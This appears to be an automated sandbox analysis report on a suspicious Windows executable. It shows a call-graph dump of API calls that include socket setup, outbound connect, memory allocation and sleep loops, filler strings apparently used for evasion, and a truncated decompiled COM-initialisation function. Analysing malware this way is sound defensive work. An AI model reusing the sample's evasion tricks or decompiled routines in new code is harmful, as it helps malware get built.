                                    Commandline:'C:\ProgramData\images.exe'
                                    Imagebase:0xcc0000
                                    File size:874592 bytes
                                    MD5 hash:94FF625253B3920FE5B6824BD8C30482
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:low

                                    Disassembly

                                    Code Analysis

                                      Execution Graph

                                      Execution Coverage:5.3%
                                      Dynamic/Decrypted Code Coverage:65.5%
                                      Signature Coverage:3.9%
                                      Total number of Nodes:1100
                                      Total number of Limit Nodes:42

                                      Graph

                                       execution_graph: call-graph node and edge listing (node id, function address, Win32 APIs called per node) rendered as an interactive graph on the original page; the flattened dump is not reproduced here.
12e5043 28127->28093 28129 12e5009 28129->28127 28285 12e92af 39 API calls 28129->28285 28130->28087 28131->28096 28132->28098 28133->28101 28134->28077 28135->28080 28136->28084 28137->28105 28139 12e1f2c ___vcrt_initialize_winapi_thunks 28138->28139 28151 12e22fe 28139->28151 28143 12e1f42 28144 12e1f4d 28143->28144 28165 12e233a DeleteCriticalSection 28143->28165 28144->28107 28146 12e1f3a 28146->28107 28193 12e9ee2 28147->28193 28150 12e1f50 8 API calls 3 library calls 28150->28108 28152 12e2307 28151->28152 28154 12e2330 28152->28154 28155 12e1f36 28152->28155 28166 12e2550 28152->28166 28171 12e233a DeleteCriticalSection 28154->28171 28155->28146 28157 12e22b0 28155->28157 28186 12e249c 28157->28186 28160 12e22c5 28160->28143 28162 12e22d3 28163 12e22e0 28162->28163 28192 12e22e3 6 API calls ___vcrt_FlsFree 28162->28192 28163->28143 28165->28146 28172 12e242d 28166->28172 28168 12e256a 28169 12e2588 InitializeCriticalSectionAndSpinCount 28168->28169 28170 12e2573 28168->28170 28169->28170 28170->28152 28171->28155 28173 12e2455 28172->28173 28174 12e2451 __crt_fast_encode_pointer 28172->28174 28173->28174 28179 12e2369 28173->28179 28174->28168 28177 12e246f GetProcAddress 28177->28174 28178 12e247f __crt_fast_encode_pointer 28177->28178 28178->28174 28181 12e2378 try_get_first_available_module 28179->28181 28180 12e2395 LoadLibraryExW 28180->28181 28182 12e23b0 GetLastError 28180->28182 28181->28180 28183 12e240b FreeLibrary 28181->28183 28184 12e2422 28181->28184 28185 12e23e3 LoadLibraryExW 28181->28185 28182->28181 28183->28181 28184->28174 28184->28177 28185->28181 28187 12e242d try_get_function 5 API calls 28186->28187 28188 12e24b6 28187->28188 28189 12e24cf TlsAlloc 28188->28189 28190 12e22ba 28188->28190 28190->28160 28191 12e2512 6 API calls try_get_function 28190->28191 28191->28162 28192->28160 28196 12e9eff 28193->28196 28197 12e9efb 28193->28197 28195 12e1526 28195->28111 28195->28150 28196->28197 28199 12e6c48 28196->28199 28211 12e1c5e 
28197->28211 28200 12e6c54 ___DestructExceptionObject 28199->28200 28218 12e93db EnterCriticalSection 28200->28218 28202 12e6c5b 28219 12e951c 28202->28219 28204 12e6c6a 28210 12e6c79 28204->28210 28232 12e6adc 29 API calls 28204->28232 28207 12e6c74 28233 12e6b94 GetStdHandle GetFileType 28207->28233 28208 12e6c8a __onexit 28208->28196 28234 12e6c95 LeaveCriticalSection __onexit 28210->28234 28212 12e1c69 IsProcessorFeaturePresent 28211->28212 28213 12e1c67 28211->28213 28215 12e1cab 28212->28215 28213->28195 28277 12e1c6f SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 28215->28277 28217 12e1d8e 28217->28195 28218->28202 28220 12e9528 ___DestructExceptionObject 28219->28220 28221 12e9548 28220->28221 28222 12e9531 28220->28222 28235 12e93db EnterCriticalSection 28221->28235 28243 12e621a 20 API calls __dosmaperr 28222->28243 28225 12e9536 28244 12e615d 26 API calls __cftof 28225->28244 28227 12e9540 __onexit 28227->28204 28228 12e9580 28245 12e95a7 LeaveCriticalSection __onexit 28228->28245 28230 12e9554 28230->28228 28236 12e946d 28230->28236 28232->28207 28233->28210 28234->28208 28235->28230 28246 12e622d 28236->28246 28238 12e947f 28242 12e948c 28238->28242 28253 12e65f4 28238->28253 28240 12e94de 28240->28230 28260 12e628a 20 API calls _free 28242->28260 28243->28225 28244->28227 28245->28227 28252 12e623a pre_c_initialization 28246->28252 28247 12e627a 28262 12e621a 20 API calls __dosmaperr 28247->28262 28248 12e6265 RtlAllocateHeap 28250 12e6278 28248->28250 28248->28252 28250->28238 28252->28247 28252->28248 28261 12e9fbc 7 API calls 2 library calls 28252->28261 28263 12e63c0 28253->28263 28256 12e6639 InitializeCriticalSectionAndSpinCount 28257 12e6624 28256->28257 28258 12e1c5e _ValidateLocalCookies 5 API calls 28257->28258 28259 12e6650 28258->28259 28259->28238 28260->28240 28261->28252 28262->28250 28264 12e63ed 28263->28264 28268 12e63e9 28263->28268 28264->28268 28270 12e62f8 28264->28270 28267 12e6407 
GetProcAddress 28267->28268 28269 12e6417 __crt_fast_encode_pointer 28267->28269 28268->28256 28268->28257 28269->28268 28275 12e6309 try_get_first_available_module 28270->28275 28271 12e63b3 28271->28267 28271->28268 28272 12e6326 LoadLibraryExW 28273 12e6341 GetLastError 28272->28273 28272->28275 28273->28275 28274 12e639c FreeLibrary 28274->28275 28275->28271 28275->28272 28275->28274 28276 12e6374 LoadLibraryExW 28275->28276 28276->28275 28277->28217 28278->28123 28280 12e8f89 28279->28280 28281 12e8fbb 28279->28281 28286 12e7867 28280->28286 28281->28129 28285->28129 28287 12e7878 28286->28287 28288 12e7872 28286->28288 28294 12e787e 28287->28294 28330 12e659b 11 API calls 2 library calls 28287->28330 28329 12e6545 11 API calls 2 library calls 28288->28329 28291 12e7892 28292 12e622d pre_c_initialization 20 API calls 28291->28292 28291->28294 28295 12e78a2 28292->28295 28296 12e78f7 28294->28296 28337 12e5b9d 39 API calls pre_c_initialization 28294->28337 28298 12e78bf 28295->28298 28299 12e78aa 28295->28299 28311 12e8dd2 28296->28311 28333 12e659b 11 API calls 2 library calls 28298->28333 28331 12e659b 11 API calls 2 library calls 28299->28331 28302 12e78b6 28332 12e628a 20 API calls _free 28302->28332 28303 12e78cb 28304 12e78de 28303->28304 28305 12e78cf 28303->28305 28335 12e75dd 20 API calls pre_c_initialization 28304->28335 28334 12e659b 11 API calls 2 library calls 28305->28334 28309 12e78e9 28336 12e628a 20 API calls _free 28309->28336 28338 12e8eed 28311->28338 28313 12e8de5 28345 12e8b66 28313->28345 28316 12e8dfe 28316->28281 28322 12e8e3c 28372 12e621a 20 API calls __dosmaperr 28322->28372 28324 12e8e41 28373 12e628a 20 API calls _free 28324->28373 28325 12e8e59 28326 12e8e85 28325->28326 28374 12e628a 20 API calls _free 28325->28374 28326->28324 28375 12e8a62 26 API calls 2 library calls 28326->28375 28329->28287 28330->28291 28331->28302 28332->28294 28333->28303 28334->28302 28335->28309 28336->28294 28339 12e8ef9 ___DestructExceptionObject 
28338->28339 28341 12e8f78 __onexit 28339->28341 28376 12e5b9d 39 API calls pre_c_initialization 28339->28376 28377 12e93db EnterCriticalSection 28339->28377 28378 12e628a 20 API calls _free 28339->28378 28379 12e8f6f LeaveCriticalSection __onexit 28339->28379 28341->28313 28380 12e375f 28345->28380 28348 12e8b99 28350 12e8b9e GetACP 28348->28350 28351 12e8bb0 28348->28351 28349 12e8b87 GetOEMCP 28349->28351 28350->28351 28351->28316 28352 12e6edf 28351->28352 28353 12e6f1d 28352->28353 28354 12e6eed 28352->28354 28392 12e621a 20 API calls __dosmaperr 28353->28392 28356 12e6f08 HeapAlloc 28354->28356 28359 12e6ef1 pre_c_initialization 28354->28359 28358 12e6f1b 28356->28358 28356->28359 28357 12e6f22 28357->28324 28361 12e8fdb 28357->28361 28358->28357 28359->28353 28359->28356 28391 12e9fbc 7 API calls 2 library calls 28359->28391 28362 12e8b66 41 API calls 28361->28362 28363 12e8ffa 28362->28363 28366 12e904a GetACP 28363->28366 28367 12e9058 IsValidCodePage 28363->28367 28369 12e9004 28363->28369 28371 12e907d ___scrt_fastfail 28363->28371 28364 12e1c5e _ValidateLocalCookies 5 API calls 28365 12e8e34 28364->28365 28365->28322 28365->28325 28366->28367 28366->28369 28368 12e906a GetCPInfo 28367->28368 28367->28369 28368->28369 28368->28371 28369->28364 28393 12e8c3e GetCPInfo 28371->28393 28372->28324 28373->28316 28374->28326 28375->28324 28377->28339 28378->28339 28379->28339 28381 12e377c 28380->28381 28387 12e3772 28380->28387 28381->28387 28388 12e77b3 39 API calls 2 library calls 28381->28388 28383 12e379d 28389 12e79fa 39 API calls __cftof 28383->28389 28385 12e37b6 28390 12e7a27 39 API calls __cftof 28385->28390 28387->28348 28387->28349 28388->28383 28389->28385 28390->28387 28391->28359 28392->28357 28399 12e8c78 28393->28399 28402 12e8d22 28393->28402 28396 12e1c5e _ValidateLocalCookies 5 API calls 28398 12e8dce 28396->28398 28398->28369 28403 12e999a 28399->28403 28401 12eb6f3 __vfwprintf_l 44 API calls 28401->28402 28402->28396 28404 12e375f __cftof 
39 API calls 28403->28404 28405 12e99ba MultiByteToWideChar 28404->28405 28407 12e9a77 28405->28407 28408 12e99f3 28405->28408 28409 12e1c5e _ValidateLocalCookies 5 API calls 28407->28409 28411 12e6edf __vfwprintf_l 21 API calls 28408->28411 28415 12e9a0b ___scrt_fastfail __vfwprintf_l 28408->28415 28412 12e8cd9 28409->28412 28410 12e9a71 28422 12e9a9e 20 API calls _free 28410->28422 28411->28415 28417 12eb6f3 28412->28417 28414 12e9a47 MultiByteToWideChar 28414->28410 28416 12e9a61 GetStringTypeW 28414->28416 28415->28410 28415->28414 28416->28410 28418 12e375f __cftof 39 API calls 28417->28418 28419 12eb706 28418->28419 28423 12eb50d 28419->28423 28422->28407 28424 12eb528 __vfwprintf_l 28423->28424 28425 12eb54e MultiByteToWideChar 28424->28425 28426 12eb6cb 28425->28426 28427 12eb57a 28425->28427 28428 12e1c5e _ValidateLocalCookies 5 API calls 28426->28428 28432 12e6edf __vfwprintf_l 21 API calls 28427->28432 28436 12eb58f __vfwprintf_l 28427->28436 28429 12e8cfa 28428->28429 28429->28401 28430 12eb5c7 MultiByteToWideChar 28431 12eb632 28430->28431 28433 12eb5de 28430->28433 28459 12e9a9e 20 API calls _free 28431->28459 28432->28436 28450 12e6656 28433->28450 28436->28430 28436->28431 28438 12eb609 28438->28431 28442 12e6656 __vfwprintf_l 11 API calls 28438->28442 28439 12eb641 28440 12e6edf __vfwprintf_l 21 API calls 28439->28440 28444 12eb653 __vfwprintf_l 28439->28444 28440->28444 28441 12eb6bc 28458 12e9a9e 20 API calls _free 28441->28458 28442->28431 28444->28441 28445 12e6656 __vfwprintf_l 11 API calls 28444->28445 28446 12eb69b 28445->28446 28446->28441 28447 12eb6aa WideCharToMultiByte 28446->28447 28447->28441 28448 12eb6ea 28447->28448 28460 12e9a9e 20 API calls _free 28448->28460 28461 12e62c4 28450->28461 28453 12e6672 28456 12e1c5e _ValidateLocalCookies 5 API calls 28453->28456 28455 12e66b2 LCMapStringW 28455->28453 28457 12e66c4 28456->28457 28457->28431 28457->28438 28457->28439 28458->28431 28459->28426 28460->28431 28462 12e63c0 
pre_c_initialization 5 API calls 28461->28462 28463 12e62da 28462->28463 28463->28453 28464 12e66ca 10 API calls 2 library calls 28463->28464 28464->28455 28465 12f1106 WSAStartup socket 28466 12f113c inet_addr htons connect 28465->28466 28467 12f1137 28465->28467 28468 12f1100 28466->28468 28468->28465 28469 12f6aa6 28470 12f6abb 28469->28470 28472 12f6b95 28470->28472 28507 12e1040 79 API calls __vfwprintf_l 28470->28507 28474 12f6c24 28472->28474 28508 12e1040 79 API calls __vfwprintf_l 28472->28508 28476 12f6f17 28474->28476 28509 12e1040 79 API calls __vfwprintf_l 28474->28509 28480 12f707f 28476->28480 28510 12e1040 79 API calls __vfwprintf_l 28476->28510 28481 12f717c 28480->28481 28511 12e1040 79 API calls __vfwprintf_l 28480->28511 28483 12f71cc 28481->28483 28512 12e1040 79 API calls __vfwprintf_l 28481->28512 28482 12f72c0 28489 12f7331 28482->28489 28514 12e1040 79 API calls __vfwprintf_l 28482->28514 28483->28482 28513 12e1040 79 API calls __vfwprintf_l 28483->28513 28487 12f7498 28490 12f74e8 28487->28490 28516 12e1040 79 API calls __vfwprintf_l 28487->28516 28489->28487 28515 12e1040 79 API calls __vfwprintf_l 28489->28515 28493 12f7614 28490->28493 28517 12e1040 79 API calls __vfwprintf_l 28490->28517 28495 12f7707 28493->28495 28518 12e1040 79 API calls __vfwprintf_l 28493->28518 28496 12f77a9 28495->28496 28519 12e1040 79 API calls __vfwprintf_l 28495->28519 28498 12f781b 28496->28498 28520 12e1040 79 API calls __vfwprintf_l 28496->28520 28499 12f78c2 Sleep 28498->28499 28504 12f78cf 28498->28504 28499->28498 28500 12f79f6 28523 1301280 79 API calls 28500->28523 28502 12f7a08 28505 12f79a6 28504->28505 28521 12e1040 79 API calls __vfwprintf_l 28504->28521 28505->28500 28522 12e1040 79 API calls __vfwprintf_l 28505->28522 28507->28470 28508->28472 28509->28474 28510->28476 28511->28480 28512->28481 28513->28483 28514->28482 28515->28489 28516->28487 28517->28490 28518->28493 28519->28495 28520->28496 28521->28504 28522->28505 28523->28502 28524 
25118f 28527 2601ce 28524->28527 28534 25e236 CreateMutexA 28527->28534 28529 2601e3 28535 255adb GetProcessHeap HeapAlloc 28529->28535 28531 2601eb 28532 251194 28531->28532 28536 260c9a 28531->28536 28534->28529 28535->28531 28548 255adb GetProcessHeap HeapAlloc 28536->28548 28538 260cba 28549 255adb GetProcessHeap HeapAlloc 28538->28549 28540 260cf0 28550 2606d5 CoInitialize CoCreateInstance 28540->28550 28541 260ce4 28541->28540 28559 260430 GetProcessHeap HeapAlloc 28541->28559 28545 260d02 28546 260d10 28545->28546 28560 260500 12 API calls 28545->28560 28546->28532 28548->28538 28549->28541 28551 26082c 28550->28551 28557 260715 28550->28557 28551->28545 28551->28546 28553 26075c VariantInit 28553->28557 28554 260806 CoUninitialize 28554->28551 28557->28551 28557->28553 28557->28554 28557->28557 28561 255adb GetProcessHeap HeapAlloc 28557->28561 28562 26098d GetProcessHeap HeapAlloc 28557->28562 28563 25239f GetProcessHeap HeapAlloc 28557->28563 28559->28540 28560->28545 28561->28557 28562->28557 28563->28557 28564 12e1462 28567 12e1753 28564->28567 28566 12e1467 28566->28566 28568 12e1769 28567->28568 28570 12e1772 28568->28570 28571 12e1706 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId RtlQueryPerformanceCounter 28568->28571 28570->28566 28571->28570 28572 12f7a20 28573 12f7a3c 28572->28573 28574 12f7b65 VirtualAlloc 28573->28574 28575 12f7b94 _strlen 28574->28575 28576 25b66a DeleteCriticalSection 28577 25b685 28576->28577 28578 25b67e CloseHandle 28576->28578 28579 25b695 28577->28579 28580 25b68e CloseHandle 28577->28580 28578->28577 28583 25510d WSACleanup 28579->28583 28580->28579 28590 25e221 ReleaseMutex CloseHandle 28583->28590 28585 255121 28586 252e66 2 API calls 28585->28586 28587 255129 28586->28587 28588 252e66 2 API calls 28587->28588 28589 255131 28588->28589 28590->28585 28591 258c74 28592 255a2d VirtualFree 28591->28592 28593 258c7f 28591->28593 28594 260a57 28595 260a62 28594->28595 28596 260ac2 OleUninitialize 
28595->28596 28597 12e4dfc 28598 12e8f80 53 API calls 28597->28598 28599 12e4e0e 28598->28599 28608 12e9317 GetEnvironmentStringsW 28599->28608 28604 12e4e48 28605 12e4e24 28621 12e628a 20 API calls _free 28605->28621 28607 12e4e19 28622 12e628a 20 API calls _free 28607->28622 28609 12e932e 28608->28609 28619 12e9381 28608->28619 28610 12e9334 WideCharToMultiByte 28609->28610 28613 12e9350 28610->28613 28610->28619 28611 12e938a FreeEnvironmentStringsW 28612 12e4e13 28611->28612 28612->28607 28620 12e4e4e 26 API calls 4 library calls 28612->28620 28614 12e6edf __vfwprintf_l 21 API calls 28613->28614 28615 12e9356 28614->28615 28616 12e935d WideCharToMultiByte 28615->28616 28617 12e9373 28615->28617 28616->28617 28623 12e628a 20 API calls _free 28617->28623 28619->28611 28619->28612 28620->28605 28621->28607 28622->28604 28623->28619 28624 12e939a 28625 12e93a5 28624->28625 28626 12e65f4 11 API calls 28625->28626 28627 12e93ce 28625->28627 28628 12e93ca 28625->28628 28626->28625 28630 12e93f2 DeleteCriticalSection 28627->28630 28630->28628 28631 12e79b4 28639 12e6499 28631->28639 28634 12e79c8 28636 12e79d0 28637 12e79dd 28636->28637 28647 12e79e0 11 API calls 28636->28647 28640 12e63c0 pre_c_initialization 5 API calls 28639->28640 28641 12e64c0 28640->28641 28642 12e64d8 TlsAlloc 28641->28642 28644 12e64c9 28641->28644 28642->28644 28643 12e1c5e _ValidateLocalCookies 5 API calls 28645 12e64e9 28643->28645 28644->28643 28645->28634 28646 12e7901 20 API calls 2 library calls 28645->28646 28646->28636 28647->28634 28648 12e12d4 28653 12e19aa SetUnhandledExceptionFilter 28648->28653 28650 12e12d9 pre_c_initialization 28654 12e554a 26 API calls 2 library calls 28650->28654 28652 12e12e4 28653->28650 28654->28652 28655 25119e 28658 261824 28655->28658 28731 252460 28658->28731 28661 252460 VirtualAlloc 28662 261841 28661->28662 28663 252460 VirtualAlloc 28662->28663 28664 26184b 28663->28664 28665 252460 VirtualAlloc 28664->28665 28666 261855 28665->28666 28667 252460 
VirtualAlloc 28666->28667 28668 26185f 28667->28668 28669 252460 VirtualAlloc 28668->28669 28670 261869 28669->28670 28734 2510ad GetProcessHeap HeapAlloc 28670->28734 28672 261890 28735 2510ad GetProcessHeap HeapAlloc 28672->28735 28674 261899 28736 2510ad GetProcessHeap HeapAlloc 28674->28736 28676 2618a2 28737 2510ad GetProcessHeap HeapAlloc 28676->28737 28678 2618ab 28738 2510ad GetProcessHeap HeapAlloc 28678->28738 28680 2618b5 28739 2510ad GetProcessHeap HeapAlloc 28680->28739 28682 2618bf 28740 25fadf 28682->28740 28685 25fadf 2 API calls 28686 2618d0 28685->28686 28687 25fadf 2 API calls 28686->28687 28688 2618d7 28687->28688 28689 25fadf 2 API calls 28688->28689 28690 2618df 28689->28690 28691 25fadf 2 API calls 28690->28691 28692 2618e7 28691->28692 28693 25fadf 2 API calls 28692->28693 28694 2618ef 28693->28694 28695 2531ec 4 API calls 28694->28695 28696 2618fb 28695->28696 28744 25dd40 28696->28744 28698 261906 28747 255a2d VirtualFree 28698->28747 28700 26190e 28701 2531ec 4 API calls 28700->28701 28702 261918 28701->28702 28703 25dd40 5 API calls 28702->28703 28704 261923 28703->28704 28748 255a2d VirtualFree 28704->28748 28706 26192b 28707 2531ec 4 API calls 28706->28707 28708 261935 28707->28708 28709 25dd40 5 API calls 28708->28709 28710 261940 28709->28710 28749 255a2d VirtualFree 28710->28749 28712 261948 28713 2531ec 4 API calls 28712->28713 28714 261954 28713->28714 28715 25dd40 5 API calls 28714->28715 28716 26195f 28715->28716 28750 255a2d VirtualFree 28716->28750 28718 261967 28719 2531ec 4 API calls 28718->28719 28720 261973 28719->28720 28721 25dd40 5 API calls 28720->28721 28722 26197e 28721->28722 28751 255a2d VirtualFree 28722->28751 28724 261986 28725 2531ec 4 API calls 28724->28725 28726 261992 28725->28726 28727 25dd40 5 API calls 28726->28727 28728 26199d 28727->28728 28752 255a2d VirtualFree 28728->28752 28730 2511a3 28753 25dd6c 28731->28753 28734->28672 28735->28674 28736->28676 28737->28678 28738->28680 28739->28682 28741 25fae5 
28740->28741 28743 25fb02 28741->28743 28756 25fb09 Sleep GetTickCount 28741->28756 28743->28685 28757 252f52 28744->28757 28747->28700 28748->28706 28749->28712 28750->28718 28751->28724 28752->28730 28754 252ff0 VirtualAlloc 28753->28754 28755 252473 28754->28755 28755->28661 28756->28741 28765 255a2d VirtualFree 28757->28765 28759 252f60 28760 252f84 CreateEventA 28759->28760 28766 25319f lstrlenA 28759->28766 28760->28698 28762 252f72 28763 2559aa VirtualAlloc 28762->28763 28764 252f79 lstrcatA 28763->28764 28764->28760 28765->28759 28766->28762

                                      Executed Functions

                                      Control-flow Graph

                                      APIs
                                      • VirtualAlloc.KERNEL32(00000000,012F0BBA,00003000,00000004), ref: 012F7B75
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424346882.012E1000.00000020.00020000.sdmp, Offset: 012E0000, based on PE: true
                                      • Associated: 00000000.00000002.424335940.012E0000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.424399292.01302000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.424424990.0130B000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424434447.0130C000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424444007.0130D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424454583.0130F000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424487286.013A0000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424497060.013A1000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424508147.013A4000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424518494.013A5000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424528540.013A7000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424539586.013A9000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424554021.013AD000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424563735.013AE000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424574199.013B1000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424583869.013B3000.00000002.00020000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_12e0000_4ifN8B061M.jbxd
                                      Similarity
                                      • API ID: AllocVirtual
                                      • String ID: In 2010 the government approved a 3.4 billion settlement for the trust case Major portions of the settlement were to partially compensate individual account holders and to buy back fractionated land interests and restore land to reservations$g_2660$g_2660$g_2660$g_2660$g_2660$g_2660$g_2660$g_2660$g_2660$g_2660$g_2660$g_2660$g_2660$g_2660$g_2660$g_2660$g_2660$g_2660$g_2660$g_2660$g_2660$g_2660$g_2660$g_2660$g_2762$g_2762$g_2762$g_2762$g_2762$g_2762$g_2762$g_2762$g_2762$g_2762$g_2762$g_2762$g_2762$g_2762$g_2762$g_2762$g_2762$g_2762$g_2762$g_2762$g_2762$g_2762$g_2762$g_2762$g_2863$g_2863$g_2863$g_2863$g_2863$g_2863$g_2863$g_2863$g_2863$g_2863$g_2863$g_2863$g_2863$g_2863$g_2863$g_2863$g_2863$g_2863$g_2863$g_2863$g_2863$g_2863$g_2863$g_2863$g_3376$g_3376$g_3376$g_3376$g_3376$g_3376$g_3376$g_3376$g_3376$g_3376$g_3376$g_3376$g_3376$g_3376$g_3376$g_3376$g_3376$g_3376$g_3376$g_3376$g_3376$g_3376$g_3376$g_3376$g_3433$g_3433$g_3433$g_3433$g_3433$g_3433$g_3433$g_3433$g_3433$g_3433$g_3433$g_3433$g_3433$g_3433$g_3433$g_3433$g_3433$g_3433$g_3433$g_3433$g_3433$g_3433$g_3433$g_3433$g_3435$g_3435$g_3435$g_3435$g_3435$g_3435$g_3435$g_3435$g_3435$g_3435$g_3435$g_3435$g_3435$g_3435$g_3435$g_3435$g_3435$g_3435$g_3435$g_3435$g_3435$g_3435$g_3435$g_3435$g_3542.f0$g_3542.f0$g_3542.f0$g_3542.f0$g_3542.f0$g_3542.f0$g_3542.f0$g_3542.f0$g_3542.f0$g_3542.f0$g_3542.f0$g_3542.f0$g_3542.f0$g_3542.f0$g_3542.f0$g_3542.f0$g_3542.f0$g_3542.f0$g_3542.f0$g_3542.f0$g_3542.f0$g_3542.f0$g_3542.f0$g_3542.f0$g_3542.f1$g_3542.f1$g_3542.f1$g_3542.f1$g_3542.f1$g_3542.f1$g_3542.f1$g_3542.f1$g_3542.f1$g_3542.f1$g_3542.f1$g_3542.f1$g_3542.f1$g_3542.f1$g_3542.f1$g_3542.f1$g_3542.f1$g_3542.f1$g_3542.f1$g_3542.f1$g_3542.f1$g_3542.f1$g_3542.f1$g_3542.f1$g_3542.f2$g_3542.f2$g_3542.f2$g_3542.f2$g_3542.f2$g_3542.f2$g_3542.f2$g_3542.f2$g_3542.f2$g_3542.f2$g_3542.f2$g_3542.f2$g_3542.f2$g_3542.f2$g_3542.f2$g_3542.f2$g_3542.f2$g_3542.f2$g_3542.f2$g_3542.f2$g_3542.f2$g_3542.f2
$g_3542.f2$g_3542.f2$g_3542.f3$g_3542.f3$g_3542.f3$g_3542.f3$g_3542.f3$g_3542.f3$g_3542.f3$g_3542.f3$g_3542.f3$g_3542.f3$g_3542.f3$g_3542.f3$g_3542.f3$g_3542.f3$g_3542.f3$g_3542.f3$g_3542.f3$g_3542.f3$g_3542.f3$g_3542.f3$g_3542.f3$g_3542.f3$g_3542.f3$g_3542.f3$g_3542.f4$g_3542.f4$g_3542.f4$g_3542.f4$g_3542.f4$g_3542.f4$g_3542.f4$g_3542.f4$g_3542.f4$g_3542.f4$g_3542.f4$g_3542.f4$g_3542.f4$g_3542.f4$g_3542.f4$g_3542.f4$g_3542.f4$g_3542.f4$g_3542.f4$g_3542.f4$g_3542.f4$g_3542.f4$g_3542.f4$g_3542.f4$g_3553$g_3553$g_3553$g_3553$g_3553$g_3553$g_3553$g_3553$g_3553$g_3553$g_3553$g_3553$g_3553$g_3553$g_3553$g_3553$g_3553$g_3553$g_3553$g_3553$g_3553$g_3553$g_3553$g_3553
                                      • API String ID: 4275171209-94128256
                                      • Opcode ID: 8c52ca6c9fe9b48a34e186c163c830a292d81838e24ca7777649b20f6c9a1983
                                      • Instruction ID: 7135f06ce61a4c32c8b97584fc02fcfb6e499ec8534753240b351fdc77e57be9
                                      • Opcode Fuzzy Hash: 8c52ca6c9fe9b48a34e186c163c830a292d81838e24ca7777649b20f6c9a1983
                                      • Instruction Fuzzy Hash: 58F286F7A403007AF32A72296C63F7736ADC396B4CF984548F5249A3C7F566E9104368
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      APIs
                                      Strings
                                      Similarity
                                      • API ID: Sleep
                                      • String ID: 7$g_32969$g_33076$g_33266$g_33291$g_33331$g_33450$g_33784[i]$g_33906$g_34033[i][j]$g_34059$g_34335.f0$g_34335.f1$g_34335.f2$g_34335.f3$g_34335.f4$g_34597$g_34732.f0$g_34732.f1$g_34732.f2$g_34732.f3$g_34732.f4$g_34741$g_34858.f0$g_34858.f1$g_34858.f2$g_34858.f3$g_34858.f4$g_35067[i][j][k][l]$g_35113$g_35507$g_35613$g_35689$g_35997$g_36187$g_36207[i][j][k][l]$g_36312$g_36345$g_36361$g_36436$g_36525$g_36532[i][j]$g_36590[i]$g_36642$g_36953$g_37038$g_37257[i][j][k]$g_37445[i][j]$g_37452$g_37527$g_37537$g_37541$g_37560$g_37723$g_37892[i][j][k][l]$g_37946[i]$g_38136$g_38176$g_38237$g_38283$g_38304$g_38365$g_38536$g_38649[i][j]$g_38652$g_38688$g_38701$g_38723$g_38756$g_38758$g_38769[i]$g_38773$g_38775$g_38781$g_38782[i]$g_38790[i][j]$g_38794$g_38920$g_38925$g_39006$g_39046$g_39047$g_39180$g_39383$g_39385[i][j][k]$g_39448[i]$index = [%d]$index = [%d]$index = [%d]$index = [%d]$index = [%d]$index = [%d]$index = [%d][%d]$index = [%d][%d]$index = [%d][%d]$index = [%d][%d]$index = [%d][%d]$index = [%d][%d][%d]$index = [%d][%d][%d]$index = [%d][%d][%d][%d]$index = [%d][%d][%d][%d]$index = [%d][%d][%d][%d]
                                      • API String ID: 3472027048-4294153300
                                      • Opcode ID: 0539e477651dd54e425a078ce3c53cfe7aee5c1134a877c541790b5cc548f3bb
                                      • Instruction ID: aaf6a01618722533c769df44f806352c48c59e956152b74a3e482d8d97fbd059
                                      • Opcode Fuzzy Hash: 0539e477651dd54e425a078ce3c53cfe7aee5c1134a877c541790b5cc548f3bb
                                      • Instruction Fuzzy Hash: 93A28CB6E10205FFEB09EB98D856DBFB7B9EB85708F5085ACF51157341D270AA00CBA1
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
[Control-flow graph for E002606D5, blocks 2606d5-260830; rendered image not available. API calls on the graph: CoInitialize, CoCreateInstance (block 2606d5), VariantInit (block 26075c), CoUninitialize (block 260826). Internal calls: 255adb (block 260794), 26098d (block 2607a0), 25239f (block 2607d6).]
                                      C-Code - Quality: 59%
                                      			E002606D5(intOrPtr __ecx) {
                                      				signed int _v8;
                                      				signed int _v12;
                                      				void* _v16;
                                      				signed int _v20;
                                      				char _v24;
                                      				intOrPtr _v28;
                                      				signed short* _v36;
                                      				char _v44;
                                      				signed int* _t43;
                                      				intOrPtr* _t47;
                                      				void* _t48;
                                      				intOrPtr* _t50;
                                      				intOrPtr* _t54;
                                      				signed int _t57;
                                      				char _t60;
                                      				signed int _t61;
                                      				intOrPtr* _t63;
                                      				signed int _t64;
                                      				intOrPtr* _t66;
                                      				intOrPtr* _t67;
                                      				intOrPtr* _t70;
                                      				intOrPtr* _t71;
                                      				void* _t73;
                                      				signed int _t76;
                                      				signed int _t85;
                                      				signed int _t87;
                                      				signed short* _t88;
                                      
                                      				_t87 = 0;
                                      				_v28 = __ecx;
                                      				__imp__CoInitialize(0); // executed
                                      				_t43 =  &_v12;
                                      				_v16 = 0;
                                      				_v12 = 0;
                                      				_v8 = 0;
                                      				__imp__CoCreateInstance(0x2625a0, 0, 1, 0x264834, _t43); // executed
                                      				_t66 = _v12;
                                      				if(_t66 != 0) {
                                      					_t43 =  *((intOrPtr*)( *_t66 + 0xc))(_t66, 0x262590,  &_v8, 0);
                                      					_t67 = _v8;
                                      					if(_t67 != 0) {
                                      						 *((intOrPtr*)( *_t67 + 0x14))(_t67);
                                      						_t64 = 0;
                                      						while(1) {
                                      							_t47 = _v8;
                                      							_v20 = _t87;
